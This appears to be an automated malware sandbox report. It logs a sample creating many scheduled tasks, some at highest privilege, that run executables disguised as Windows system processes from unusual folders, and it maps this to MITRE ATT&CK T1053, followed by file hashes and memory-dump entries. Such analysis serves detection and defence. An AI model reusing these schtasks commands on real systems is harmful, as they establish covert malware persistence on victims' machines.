schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Recovery\ad6fdfc2-6219-11ed-a572-5e34c4ab0fa3\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1992

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\SendTo\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Admin\SendTo\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2084

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\SendTo\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2108

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 5 /tr "'C:\Recovery\ad6fdfc2-6219-11ed-a572-5e34c4ab0fa3\lsm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2132

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Recovery\ad6fdfc2-6219-11ed-a572-5e34c4ab0fa3\lsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2152

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 5 /tr "'C:\Recovery\ad6fdfc2-6219-11ed-a572-5e34c4ab0fa3\lsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2180

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Windows\Prefetch\ReadyBoot\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2204

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Windows\Prefetch\ReadyBoot\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2228

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Windows\Prefetch\ReadyBoot\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2252

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Program Files\Uninstall Information\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2292

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Program Files\Uninstall Information\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2320

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Common Files\SpeechEngines\WMIADAP.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2344

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WMIADAP" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\SpeechEngines\WMIADAP.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2368

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Common Files\SpeechEngines\WMIADAP.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2388

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 11 /tr "'C:\Windows\it-IT\taskhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2416

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\it-IT\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2440

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 14 /tr "'C:\Windows\it-IT\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2464

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Documents\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2492

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\All Users\Documents\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2508

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Documents\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2536

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
aea6a63b1ce3474442292d7ea5da801d

SHA1
25e014e73c1ed514a0b6f99108d5e7d40e83f2e7

SHA256
f6356c0882d56c246179c2139a39457a0bf095abe80fbfcc4e0a74613f6cb9e9

SHA512
8c824684595f02228d1bd0145d99134e48aa24e12285139061167780504e035a8074a921796fe834f4cbd402237126dd51568b044ec0e72a4858ce1b63228f82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
aea6a63b1ce3474442292d7ea5da801d

SHA1
25e014e73c1ed514a0b6f99108d5e7d40e83f2e7

SHA256
f6356c0882d56c246179c2139a39457a0bf095abe80fbfcc4e0a74613f6cb9e9

SHA512
8c824684595f02228d1bd0145d99134e48aa24e12285139061167780504e035a8074a921796fe834f4cbd402237126dd51568b044ec0e72a4858ce1b63228f82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
aea6a63b1ce3474442292d7ea5da801d

SHA1
25e014e73c1ed514a0b6f99108d5e7d40e83f2e7

SHA256
f6356c0882d56c246179c2139a39457a0bf095abe80fbfcc4e0a74613f6cb9e9

SHA512
8c824684595f02228d1bd0145d99134e48aa24e12285139061167780504e035a8074a921796fe834f4cbd402237126dd51568b044ec0e72a4858ce1b63228f82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
aea6a63b1ce3474442292d7ea5da801d

SHA1
25e014e73c1ed514a0b6f99108d5e7d40e83f2e7

SHA256
f6356c0882d56c246179c2139a39457a0bf095abe80fbfcc4e0a74613f6cb9e9

SHA512
8c824684595f02228d1bd0145d99134e48aa24e12285139061167780504e035a8074a921796fe834f4cbd402237126dd51568b044ec0e72a4858ce1b63228f82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
aea6a63b1ce3474442292d7ea5da801d

SHA1
25e014e73c1ed514a0b6f99108d5e7d40e83f2e7

SHA256
f6356c0882d56c246179c2139a39457a0bf095abe80fbfcc4e0a74613f6cb9e9

SHA512
8c824684595f02228d1bd0145d99134e48aa24e12285139061167780504e035a8074a921796fe834f4cbd402237126dd51568b044ec0e72a4858ce1b63228f82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
aea6a63b1ce3474442292d7ea5da801d

SHA1
25e014e73c1ed514a0b6f99108d5e7d40e83f2e7

SHA256
f6356c0882d56c246179c2139a39457a0bf095abe80fbfcc4e0a74613f6cb9e9

SHA512
8c824684595f02228d1bd0145d99134e48aa24e12285139061167780504e035a8074a921796fe834f4cbd402237126dd51568b044ec0e72a4858ce1b63228f82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
aea6a63b1ce3474442292d7ea5da801d

SHA1
25e014e73c1ed514a0b6f99108d5e7d40e83f2e7

SHA256
f6356c0882d56c246179c2139a39457a0bf095abe80fbfcc4e0a74613f6cb9e9

SHA512
8c824684595f02228d1bd0145d99134e48aa24e12285139061167780504e035a8074a921796fe834f4cbd402237126dd51568b044ec0e72a4858ce1b63228f82

Download Submit
C:\Windows\it-IT\taskhost.exe

Filesize
2.3MB

MD5
2bf6abda97d1e5460b69e1b86bc21fb8

SHA1
712884175ccd13f72ea0f67d7ae293ccbd55ca10

SHA256
6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6

SHA512
dd990825e5ff65b53b828ba5976c5499780d3d94fc4c39260aa3c738d6fd02b97f8ea5585ba7a72a4131e5e38c3fb87b7aeaa4c66702ca77bac6b8fd2a31ffc7

Download Submit
C:\Windows\it-IT\taskhost.exe

Filesize
2.3MB

MD5
2bf6abda97d1e5460b69e1b86bc21fb8

SHA1
712884175ccd13f72ea0f67d7ae293ccbd55ca10

SHA256
6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6

SHA512
dd990825e5ff65b53b828ba5976c5499780d3d94fc4c39260aa3c738d6fd02b97f8ea5585ba7a72a4131e5e38c3fb87b7aeaa4c66702ca77bac6b8fd2a31ffc7

Download Submit
memory/1096-86-0x0000000000000000-mapping.dmp

Download
memory/1776-61-0x0000000000BF0000-0x0000000000BFC000-memory.dmp

Filesize
48KB

Download
memory/1776-64-0x0000000000DB0000-0x0000000000DBE000-memory.dmp

Filesize
56KB

Download
memory/1776-66-0x0000000000DD0000-0x0000000000DDE000-memory.dmp

Filesize
56KB

Download
memory/1776-67-0x0000000000DE0000-0x0000000000DE8000-memory.dmp

Filesize
32KB

Download
memory/1776-68-0x0000000000DF0000-0x0000000000DFA000-memory.dmp

Filesize
40KB

Download
memory/1776-69-0x0000000000E10000-0x0000000000E1C000-memory.dmp

Filesize
48KB

Download
memory/1776-55-0x00000000003E0000-0x00000000003EE000-memory.dmp

Filesize
56KB

Download
memory/1776-54-0x0000000001100000-0x0000000001360000-memory.dmp

Filesize
2.4MB

Download
memory/1776-107-0x000000001B6D6000-0x000000001B6F5000-memory.dmp

Filesize
124KB

Download
memory/1776-65-0x0000000000DC0000-0x0000000000DC8000-memory.dmp

Filesize
32KB

Download
memory/1776-63-0x0000000000DA0000-0x0000000000DAA000-memory.dmp

Filesize
40KB

Download
memory/1776-62-0x0000000000D90000-0x0000000000D98000-memory.dmp

Filesize
32KB

Download
memory/1776-56-0x000000001B6D6000-0x000000001B6F5000-memory.dmp

Filesize
124KB

Download
memory/1776-60-0x0000000000BD0000-0x0000000000BE6000-memory.dmp

Filesize
88KB

Download
memory/1776-59-0x0000000000610000-0x0000000000620000-memory.dmp

Filesize
64KB

Download
memory/1776-58-0x0000000000410000-0x0000000000418000-memory.dmp

Filesize
32KB

Download
memory/1776-57-0x0000000000BB0000-0x0000000000BCC000-memory.dmp

Filesize
112KB

Download
memory/2076-75-0x0000000000000000-mapping.dmp

Download
memory/2076-113-0x000007FEEC0D0000-0x000007FEECAF3000-memory.dmp

Filesize
10.1MB

Download
memory/2076-121-0x00000000024A4000-0x00000000024A7000-memory.dmp

Filesize
12KB

Download
memory/2192-77-0x0000000000000000-mapping.dmp

Download
memory/2244-123-0x0000000002554000-0x0000000002557000-memory.dmp

Filesize
12KB

Download
memory/2244-115-0x000007FEEC0D0000-0x000007FEECAF3000-memory.dmp

Filesize
10.1MB

Download
memory/2244-78-0x0000000000000000-mapping.dmp

Download
memory/2284-79-0x0000000000000000-mapping.dmp

Download
memory/2432-117-0x0000000002254000-0x0000000002257000-memory.dmp

Filesize
12KB

Download
memory/2432-81-0x0000000000000000-mapping.dmp

Download
memory/2432-110-0x000007FEEC0D0000-0x000007FEECAF3000-memory.dmp

Filesize
10.1MB

Download
memory/2524-83-0x0000000000000000-mapping.dmp

Download
memory/2524-122-0x0000000002844000-0x0000000002847000-memory.dmp

Filesize
12KB

Download
memory/2524-114-0x000007FEEC0D0000-0x000007FEECAF3000-memory.dmp

Filesize
10.1MB

Download
memory/2604-104-0x0000000001340000-0x00000000015A0000-memory.dmp

Filesize
2.4MB

Download
memory/2604-124-0x000000001AF86000-0x000000001AFA5000-memory.dmp

Filesize
124KB

Download
memory/2604-98-0x0000000000000000-mapping.dmp

Download
memory/2604-108-0x000000001AF86000-0x000000001AFA5000-memory.dmp

Filesize
124KB

Download
memory/2980-70-0x0000000000000000-mapping.dmp

Download
memory/2992-84-0x000007FEEC0D0000-0x000007FEECAF3000-memory.dmp

Filesize
10.1MB

Download
memory/2992-119-0x0000000002244000-0x0000000002247000-memory.dmp

Filesize
12KB

Download
memory/2992-71-0x0000000000000000-mapping.dmp

Download
memory/2992-76-0x000007FEFBB11000-0x000007FEFBB13000-memory.dmp

Filesize
8KB

Download
memory/3004-112-0x000007FEEC0D0000-0x000007FEECAF3000-memory.dmp

Filesize
10.1MB

Download
memory/3004-118-0x0000000002824000-0x0000000002827000-memory.dmp

Filesize
12KB

Download
memory/3004-72-0x0000000000000000-mapping.dmp

Download
memory/3032-116-0x00000000027F4000-0x00000000027F7000-memory.dmp

Filesize
12KB

Download
memory/3032-89-0x000007FEEC0D0000-0x000007FEECAF3000-memory.dmp

Filesize
10.1MB

Download
memory/3032-73-0x0000000000000000-mapping.dmp

Download
memory/3048-111-0x000007FEEC0D0000-0x000007FEECAF3000-memory.dmp

Filesize
10.1MB

Download
memory/3048-120-0x0000000002474000-0x0000000002477000-memory.dmp

Filesize
12KB

Download
memory/3048-74-0x0000000000000000-mapping.dmp

Download